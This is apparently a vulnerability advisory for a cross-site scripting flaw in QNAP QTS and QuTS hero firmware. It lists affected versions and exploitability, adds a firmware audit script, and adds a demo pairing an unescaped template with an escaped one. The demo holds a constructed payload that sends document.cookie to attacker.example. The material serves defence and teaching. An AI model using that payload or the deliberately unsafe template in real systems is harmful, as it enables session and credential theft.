Impact
This vulnerability is a cross-site scripting (XSS) flaw in the web interface of QNAP's QTS and QuTS hero operating systems that lets a remote attacker inject JavaScript into pages the device serves. When a logged-in user's browser runs the injected script, it executes in the security context of the NAS management interface, where it can read data that user can see, alter page content, or perform actions within that user's authenticated session. The issue is classified as CWE-79 (improper neutralization of input during web page generation); the CVSS score of 6.3 reflects a moderate impact on confidentiality and integrity.
Affected Systems
The flaw affects QNAP Systems Inc. QTS devices running firmware earlier than 5.2.9.3492 build 20260507, and QuTS hero devices running firmware earlier than 5.2.9.3499 build 20260514 (5.2 branch), 5.3.4.3500 build 20260520 (5.3 branch), or 6.0.0.3500 build 20260520 (6.0 branch). Any build older than the fixed release for its branch should be treated as affected; upgrading to the listed release or a later one for the installed branch resolves the issue.
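The following is an added example, not code from QNAP or OpenCVE, that turns the version thresholds above into a check an administrator can run over a fleet inventory. It parses the "X.Y.Z.NNNN build YYYYMMDD" form QNAP uses for firmware strings and compares against the fixed releases listed on this page. Matching a device to a fixed release by its major.minor branch, and returning null when the page lists no fixed release for that branch, are assumptions made here for illustration.

```javascript
// Fixed releases exactly as listed in the advisory text above.
const FIXED_RELEASES = {
  QTS: [{ version: '5.2.9.3492', build: 20260507 }],
  'QuTS hero': [
    { version: '5.2.9.3499', build: 20260514 },
    { version: '5.3.4.3500', build: 20260520 },
    { version: '6.0.0.3500', build: 20260520 },
  ],
};

// Parse a firmware string such as "5.2.9.3492 build 20260507".
// The build date is optional because some inventory tools drop it.
function parseFirmware(s) {
  const m = /^(\d+(?:\.\d+)*)(?:\s+build\s+(\d+))?$/i.exec(s.trim());
  if (!m) throw new Error(`unrecognised firmware string: ${s}`);
  return {
    parts: m[1].split('.').map(Number),
    build: m[2] ? Number(m[2]) : null,
  };
}

// Lexicographic compare of dotted version tuples; missing components count as 0.
function compareVersions(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const d = (a[i] ?? 0) - (b[i] ?? 0);
    if (d !== 0) return Math.sign(d);
  }
  return 0;
}

// Returns true if the firmware predates the fixed release on its branch,
// false if it is the fixed release or later, and null if the advisory lists
// no fixed release for that major.minor branch (assumption: branch = major.minor)
// or the version number equals the fixed one but no build date is available.
function isAffected(product, firmwareString) {
  const fw = parseFirmware(firmwareString);
  const candidates = FIXED_RELEASES[product];
  if (!candidates) throw new Error(`unknown product: ${product}`);
  const fixed = candidates
    .map((c) => ({ ...c, parts: c.version.split('.').map(Number) }))
    .find((c) => c.parts[0] === fw.parts[0] && c.parts[1] === fw.parts[1]);
  if (!fixed) return null;
  const cmp = compareVersions(fw.parts, fixed.parts);
  if (cmp !== 0) return cmp < 0;
  // Same version number: the build date decides, if we have it.
  if (fw.build !== null) return fw.build < fixed.build;
  return null;
}

// Constructed inventory rows (not real devices) to show the three outcomes.
const SAMPLE_INVENTORY = [
  { host: 'nas-01', product: 'QTS', firmware: '5.2.8.3000 build 20251001' },
  { host: 'nas-02', product: 'QTS', firmware: '5.2.9.3492 build 20260507' },
  { host: 'nas-03', product: 'QuTS hero', firmware: '5.3.2.3100 build 20260101' },
  { host: 'nas-04', product: 'QuTS hero', firmware: '5.4.0.1000' },
];

function auditInventory(rows) {
  return rows.map((r) => ({ host: r.host, affected: isAffected(r.product, r.firmware) }));
}

console.table(auditInventory(SAMPLE_INVENTORY));
```

A null result is deliberately not treated as "safe": it means the page gives no fixed release to compare against, so the device needs a manual check against the vendor advisory.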
Risk and Exploitability
Attackers can exploit this XSS remotely through the web management interface by submitting specially crafted input that the interface echoes into a page without proper escaping; the payload executes only when a logged-in user, typically an administrator, loads the affected page in a browser. The EPSS score of less than 1 % estimates a very low but non-zero probability of exploitation activity in the near term. The vulnerability is not listed in the CISA KEV catalog, which means no exploitation in the wild has been confirmed to CISA, not that a public exploit is impossible. The most effective mitigation is to apply the vendor-released firmware updates promptly; until a device is updated, keep its management interface off the public internet and reachable only from trusted networks, since that removes the easiest path for an attacker to deliver the crafted input.
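To make the escaping failure described above concrete, here is an added example that is not QNAP's code and does not reproduce the actual vulnerable handler, which the page does not show. It uses a hypothetical server-side template for a search page: one version concatenates user input straight into HTML, the other encodes it for the HTML attribute and element-content contexts. The attacker input is a constructed, generic XSS probe.

```javascript
// Constructed attacker input: breaks out of a quoted attribute and injects a script tag.
const PAYLOAD = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>';

// VULNERABLE (hypothetical handler): the "q" parameter is interpolated into markup as-is.
function renderSearchPageUnsafe(query) {
  return `<input name="q" value="${query}"><p>Results for ${query}</p>`;
}

// Minimal HTML entity encoder covering the five characters that matter in
// attribute-value and element-content contexts. Not sufficient on its own for
// JavaScript, URL or CSS contexts, which need their own encoders.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: every interpolation is encoded for the context it lands in, and the
// attribute value is quoted so the encoded quote cannot terminate it.
function renderSearchPageSafe(query) {
  const q = escapeHtml(query);
  return `<input name="q" value="${q}"><p>Results for ${q}</p>`;
}

// Crude check used only for this demonstration: did a <script> element reach the
// rendered output? Real testing would load the page in a browser or a DOM library.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

function demo(payload = PAYLOAD) {
  const unsafe = renderSearchPageUnsafe(payload);
  const safe = renderSearchPageSafe(payload);
  return {
    unsafeInjected: containsInjectedScript(unsafe),
    safeInjected: containsInjectedScript(safe),
    unsafe,
    safe,
  };
}

const result = demo();
console.log('unsafe render executes script:', result.unsafeInjected);
console.log('safe render executes script:  ', result.safeInjected);
console.log(result.safe);
```

The hardened output keeps the attacker's text visible on the page (encoded as `&quot;&gt;&lt;script&gt;...`) while the browser treats it as data rather than markup, which is the CWE-79 fix the vendor update is expected to implement in its own templates.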
OpenCVE Enrichment